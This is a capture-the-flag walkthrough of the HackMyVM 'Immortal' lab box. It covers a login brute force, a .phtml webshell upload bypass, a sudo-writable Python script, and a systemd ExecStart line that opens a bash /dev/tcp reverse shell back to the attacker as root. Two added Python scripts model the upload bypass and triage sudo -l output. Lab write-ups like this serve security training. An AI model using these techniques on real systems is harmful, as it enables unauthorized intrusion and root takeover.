Introduction
Box: Immortal
Difficulty: Medium
Box URL: https://hackmyvm.eu/machines/machine.php?vm=Immortal
Lab environment
Hypervisor: VirtualBox
Target IP (Immortal): 192.168.56.106
Pivot host IP (Windows 10): 192.168.56.1 and 192.168.190.100 (one interface on each network)
Attack box IP (Ubuntu 22.04): 192.168.190.30
Scanning
Zenmap's reliability really is a coin flip...
nmap -p 1-65535 -T4 -A -v 192.168.56.106/32
HTTP
Plain and simple.
A Burp Suite brute force of the login gives the password santiago.
Browsing the files, the first find is important.txt, which contains Morse code.
It decodes to NOTHIN7MPORTANT. (The 7 is --..., which is G --. followed by I .. with the letter gap dropped, so the intended text is NOTHING IMPORTANT.) Useful or not, keep it for later.
There are also several message.txt files; their contents are collected here:
I am very happy that you have included me in the project
for the quest for immortality. I am sure we will succeed, whatever it takes.
Best regards, Drake
Message to Eric.
Remember to buy mice for the experiments, there are very few left. Also remember to tell Boyras to give us the money he owes us, or else we'll have to beat it out of him ourselves.
Regards, David.
Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou".
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David
One key piece of information: the upload path is /upload_an_incredible_message.php
File upload vulnerability
Start by uploading a plain PHP webshell.
There is some basic checking on the file suffix: the .php file is rejected, but renaming it to .phtml gets it through. On a typical Debian/Ubuntu Apache + mod_php install the PHP handler is also mapped to .phtml (and .phar), so the renamed file still executes.
From there, pop a reverse shell as usual.
(First time I have seen a box where the webshell alone already gets you a flag...)
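To show why the suffix swap works and what an upload filter should do instead, here is an added Python example; it is not code from the Immortal box or from the original writeup. The target's real filter is not visible (only its behaviour: .php rejected, .phtml accepted), so the weak check below is a constructed model of a suffix denylist. PHP_HANDLER_SUFFIXES follows the FilesMatch rule shipped in Debian/Ubuntu's Apache php module configuration and so goes slightly beyond the page by also listing .phar; ALLOWLIST, the file names and the hardened check are assumptions about what a "message" upload needs.

```python
r"""Why a suffix denylist lets .phtml through, and an allowlist that does not.

Added example, not code from the Immortal VM or the original writeup. The
target's real filter is not visible, only its behaviour (.php rejected, .phtml
accepted), so `denylist_accepts` is a constructed model of such a check.
PHP_HANDLER_SUFFIXES follows the handler rule shipped in Debian/Ubuntu's
Apache php module config, <FilesMatch ".+\.ph(ar|p|tml)$">. ALLOWLIST and the
hardened check are assumptions about what a "message" upload needs.
"""
import os

DENYLIST = {".php"}                                 # constructed: the weak filter
PHP_HANDLER_SUFFIXES = {".php", ".phar", ".phtml"}  # what Apache hands to PHP
ALLOWLIST = {".txt"}                                # assumption: messages are text


def suffix(name: str) -> str:
    """Last suffix, lower-cased: 'shell.PhTml' -> '.phtml'."""
    return os.path.splitext(name)[1].lower()


def denylist_accepts(name: str) -> bool:
    """Weak check: reject only names whose last suffix is on the denylist."""
    return suffix(name) not in DENYLIST


def executes_as_php(name: str) -> bool:
    """True if the default php FilesMatch rule would run this file as PHP."""
    return suffix(name) in PHP_HANDLER_SUFFIXES


def bypass_candidates(stem: str) -> list:
    """Names the denylist accepts that the web server still executes."""
    return sorted(stem + s for s in PHP_HANDLER_SUFFIXES
                  if denylist_accepts(stem + s) and executes_as_php(stem + s))


def allowlist_accepts(name: str) -> bool:
    """Hardened check: a plain basename with one allowlisted final suffix,
    no executable suffix anywhere in the name (shell.phtml.txt) and no NUL."""
    if "\x00" in name or os.path.basename(name) != name:
        return False
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    if "." + parts[-1].lower() not in ALLOWLIST:
        return False
    inner = {"." + p.lower() for p in parts[1:-1]}
    return not (inner & PHP_HANDLER_SUFFIXES)
```

bypass_candidates("shell") lists exactly the names worth trying against a denylist of this shape. Even with the allowlist, store uploads under a server-generated name outside the document root, or in a directory where the PHP handler is disabled; the suffix check is only the first layer.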
Privilege escalation
Does this even count as privilege escalation...
Anyway, drake's home directory contains a hidden directory literally named ... (three dots), and inside it is pass.txt:
www-data@Immortal:/home/drake/...$ cat pass.txt
cat pass.txt
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456
Trying each of these passwords, the system one gets us a login as drake.
Start with sudo -l, which shows one rule:
Matching Defaults entries for drake on Immortal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User drake may run the following commands on Immortal:
(eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py
There is no need to analyse immortal.py at all: sudo only matches the command path (/usr/bin/python3) and its argument string, and /opt/immortal.py itself is writable by drake (check its owner and permissions first), so whatever we put in it runs as eric. Just overwrite it with a shell spawner:
drake@Immortal:/opt$ vi immortal.py
drake@Immortal:/opt$ cat immortal.py
import pty;pty.spawn("/bin/bash")
drake@Immortal:/opt$ sudo -u eric /usr/bin/python3 /opt/immortal.py
eric@Immortal:/opt$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@Immortal:/opt$
Escalated to eric.
Privilege escalation via the service
Start with sudo -l again:
eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User eric may run the following commands on Immortal:
(root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
(root) NOPASSWD: /usr/bin/systemctl start immortal.service
(root) NOPASSWD: /usr/bin/systemctl stop immortal.service
(root) NOPASSWD: /usr/bin/systemctl enable immortal.service
(root) NOPASSWD: /usr/bin/systemctl disable immortal.service
(root) NOPASSWD: /usr/bin/systemctl daemon-reload
Running sudoedit shows we can change the unit file's contents.
No ceremony needed, then: put a reverse shell in ExecStart, start a listener on 192.168.56.1:40001, and bring the service up. ExecStart in a system unit runs as root unless User= is set, so the shell comes back as root. Note that restart is not in the sudo list: after the edit, run daemon-reload, then stop (if the service is already running) and start. On systemd older than v239, ExecStart needs an absolute path (/bin/bash).
ExecStart=bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
Root shell obtained.
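Both escalation steps on this box come straight from reading sudo -l: a writable script argument (the drake to eric step above) and sudoedit on a unit file paired with systemctl start (this section). The following added Python script, which is not from the original writeup or the Immortal VM, parses sudo -l output and flags both patterns. The two sudo -l listings embedded in it are copied from this writeup; the rule-line regex, the Rule dataclass, the function names and the injectable is_writable check are my own assumptions, and rules that list several commands on one line are not handled.

```python
"""Triage `sudo -l` output for two escalation patterns seen on Immortal.

Added example, not from the original writeup or the Immortal VM. It parses the
'(runas) TAG: command' lines sudo -l prints and flags
  (a) rules whose arguments name a file the current user can write, e.g. a
      script handed to an interpreter such as /usr/bin/python3 /opt/immortal.py;
  (b) a root sudoedit on a .service file paired with a root systemctl
      start/restart of the same unit.
Rules listing several commands on one line are not handled.
"""
import os
import re
import shlex
from dataclasses import dataclass

# One command line of `sudo -l`, e.g. "(eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

# sudo -l output as shown in the writeup (drake, then eric); Defaults lines are skipped.
DRAKE_SUDO_L = r"""
Matching Defaults entries for drake on Immortal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User drake may run the following commands on Immortal:
    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py
"""

ERIC_SUDO_L = """
User eric may run the following commands on Immortal:
    (root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
    (root) NOPASSWD: /usr/bin/systemctl start immortal.service
    (root) NOPASSWD: /usr/bin/systemctl stop immortal.service
    (root) NOPASSWD: /usr/bin/systemctl enable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl disable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl daemon-reload
"""


@dataclass(frozen=True)
class Rule:
    runas: str       # user the command runs as ("eric", "root")
    nopasswd: bool   # NOPASSWD tag present
    argv: tuple      # command and arguments exactly as sudo will match them


def parse_sudo_l(text: str) -> list:
    """One Rule per '(runas) TAG: command' line; every other line is ignored."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append(Rule(m.group("runas").strip(), "NOPASSWD" in tags,
                          tuple(shlex.split(m.group("cmd")))))
    return rules


def writable_args(rule: Rule, is_writable=lambda p: os.access(p, os.W_OK)) -> list:
    """Absolute paths in the rule that the current user can modify.

    sudo matches the command path and arguments as strings; it does not care
    who can write the file behind an argument. A writable script given to an
    interpreter is therefore code execution as `runas`. `is_writable` is
    injectable so the logic can run away from the target filesystem.
    """
    return [a for a in rule.argv if a.startswith("/") and is_writable(a)]


def unit_file_takeover(rules) -> list:
    """Units the user can both edit (root sudoedit) and start/restart as root.

    ExecStart of a system unit runs as root unless User= is set, so editing
    the unit and starting it yields a root shell; stop/enable/disable alone
    are not enough, and restart may be missing (stop, then start).
    """
    editable, startable = set(), set()
    for r in rules:
        if r.runas != "root":
            continue
        if r.argv[0] == "sudoedit":
            editable.update(os.path.basename(a) for a in r.argv[1:] if a.endswith(".service"))
        elif (os.path.basename(r.argv[0]) == "systemctl" and len(r.argv) == 3
              and r.argv[1] in ("start", "restart")):
            startable.add(r.argv[2])
    return sorted(editable & startable)


def triage(text: str, is_writable=lambda p: os.access(p, os.W_OK)) -> list:
    """Human-readable findings for one user's sudo -l output."""
    rules = parse_sudo_l(text)
    findings = [f"writable {p} in rule run as {r.runas}: {' '.join(r.argv)}"
                for r in rules for p in writable_args(r, is_writable)]
    findings += [f"root via sudoedit + systemctl start on {u}"
                 for u in unit_file_takeover(rules)]
    return findings


if __name__ == "__main__":
    import sys
    # On the target: sudo -l | python3 sudo_triage.py
    for finding in triage(sys.stdin.read()):
        print(finding)
```

On a target, pipe the real output in with the command shown at the bottom of the script. A flagged writable path means sudo's string match on the command is bypassed by editing the file it points at; a flagged unit means the edit-then-start pair is sufficient for root regardless of whether stop, enable or disable are also permitted.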